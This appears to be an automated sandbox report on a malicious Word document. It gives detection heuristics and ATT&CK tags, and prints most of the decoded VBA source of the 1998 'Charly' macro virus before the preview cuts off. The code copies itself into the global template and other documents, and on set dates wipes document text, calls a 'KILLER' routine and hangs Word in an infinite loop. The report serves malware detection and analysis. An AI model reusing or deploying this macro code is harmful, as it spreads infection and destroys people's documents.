MALICIOUS (Risk Score: 180)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

The sample contains critical heuristics indicating the presence of VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening. The VBA script explicitly attempts to copy macros like 'CHARLYTO' and 'KILLER' to the global template and other documents, suggesting an intent to spread and establish persistence. The ClamAV detection as 'Doc.Trojan.Nottice-10' further confirms its malicious nature.

Heuristics (5)

- ClamAV: Doc.Trojan.Nottice-10 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Nottice-10
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Auto_Close macro [high, OLE_VBA_AUTOCLOSE]: Auto_Close macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18427 bytes |

SHA-256: 593ced1fd5202fa694d170a9aa7273531e4f31fe57d547dc9d93793fad8f853d

Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN() 'VIRUS CHARLY Version 2.1 Copyright Lima - Peru 1998. Charly Corp.
Attribute MAIN.VB_Description = "F%\r\n"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Project.AutoClose.MAIN"
'It was created on Dec. 1, 1998 by CharlySoft. It is protected by copyright law; any
'attempt at copying will be drastically punished. The offender will be made to kneel before
'his executioner (in this case, ME) to then be destroyed with a powerful SEXUAL ORGAN AT ITS MAXIMUM ERECTION
' ------------> Heh heh heh heh...
    Dim cjt$
    On Error GoTo -1: On Error GoTo SALIDA
    WordBasic.DisableAutoMacros 0
    cjt$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))
    If cjt$ = "normal.dot" Then
        If INFECTA = 1 Then
            GoTo SALIDA
        Else
            InfectaDOC
        End If
    Else
        InfectaGlobal
    End If
SALIDA:
    WordBasic.Call "CHARLYTO"
End Sub
Private Function INFECTA()
    Dim i
    INFECTA = 0
    If WordBasic.CountMacros(1) > 0 Then
        For i = 1 To WordBasic.CountMacros(1)
            If WordBasic.[MacroName$](i, 1) = "CHARLYTO" Then INFECTA = 1
        Next i
    End If
End Function
Private Sub InfectaDOC()
    WordBasic.FileSaveAs Format:=1
    WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen"
    WordBasic.MacroCopy "Global:CHARLYTO", WordBasic.[FileName$]() + ":CHARLYTO"
    WordBasic.MacroCopy "Global:HerramMacro", WordBasic.[FileName$]() + ":HerramMacro"
    WordBasic.MacroCopy "Global:KILLER", WordBasic.[FileName$]() + ":KILLER"
    WordBasic.FileSaveAll 1, 1
End Sub
Private Sub InfectaGlobal()
    WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoClose"
    WordBasic.MacroCopy WordBasic.[FileName$]() + ":CHARLYTO", "Global:CHARLYTO"
    WordBasic.MacroCopy WordBasic.[FileName$]() + ":HerramMacro", "Global:HerramMacro"
    WordBasic.MacroCopy WordBasic.[FileName$]() + ":KILLER", "Global:KILLER"
    WordBasic.FileSaveAll 1, 0
End Sub
Attribute VB_Name = "CHARLYTO"
Dim Texto As String
Public Sub MAIN()
Attribute MAIN.VB_Description = "Macro creada el 01/12/98 por mi%\r\n"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Project.CHARLYTO.MAIN"
    If WordBasic.Day(WordBasic.Now()) = 23 And WordBasic.Month(WordBasic.Now()) = 5 Then
        Texto = "FELIZ CUMPLEAŃOS CHARLY": FORMATO
        WordBasic.Insert "***Lima - Perú (VIRUS CHARLY)***": EMAIL
        WordBasic.Call "KILLER"
INFINITO:
        GoTo INFINITO
    ElseIf WordBasic.Day(WordBasic.Now()) = 19 And WordBasic.Month(WordBasic.Now()) = 5 Then
        Texto = "FELICIDADES POR TU CUMPLEAŃOS MINI": FORMATO
        WordBasic.Insert "En Homenaje a mi Querida Hermanita. "
        WordBasic.FormatFont Points:="24", Color:=2: WordBasic.Insert ": "
        WordBasic.FormatFont Points:="18", Color:=6: WordBasic.Insert ")"
        WordBasic.InsertPara: WordBasic.InsertPara
        WordBasic.Insert "***Lima - Perú (VIRUS CHARLY)***": EMAIL
        WordBasic.Call "KILLER"
        GoTo INFINITO
    End If '***SPECIAL DATES***
    If WordBasic.Day(WordBasic.Now()) = 1 Or WordBasic.Day(WordBasic.Now()) = 4 _
    Or WordBasic.Day(WordBasic.Now()) = 11 Or WordBasic.Day(WordBasic.Now()) = 13 _
    Or WordBasic.Day(WordBasic.Now()) = 17 Or WordBasic.Day(WordBasic.Now()) = 31 _
    Or (WordBasic.Day(WordBasic.Now()) = 25 And WordBasic.Month(WordBasic.Now()) = 12) Then
        If WordBasic.Day(WordBasic.Now()) = 25 And WordBasic.Month(WordBasic.Now()) = 12 Then
            Texto = "FELIZ NAVIDAD .... Je Je Je": FORMATO
            WordBasic.Insert "Les Desea C.J.T.A."
        End If
        Texto = " ***Lima - Perú (VIRUS CHARLY)***": FORMATO
        EMAIL
        WordBasic.Call "KILLER"
        GoTo INFINITO
    End If
End Sub
Private Sub FORMATO()
    WordBasic.EditSelectAll: Selection.Delete
    WordBasic.ToggleFull: WordBasic.Font "Busorama MD BT": WordBasic.FontSize 20
    WordBasic.CenterPara: WordBasic.Inse
```

... (truncated)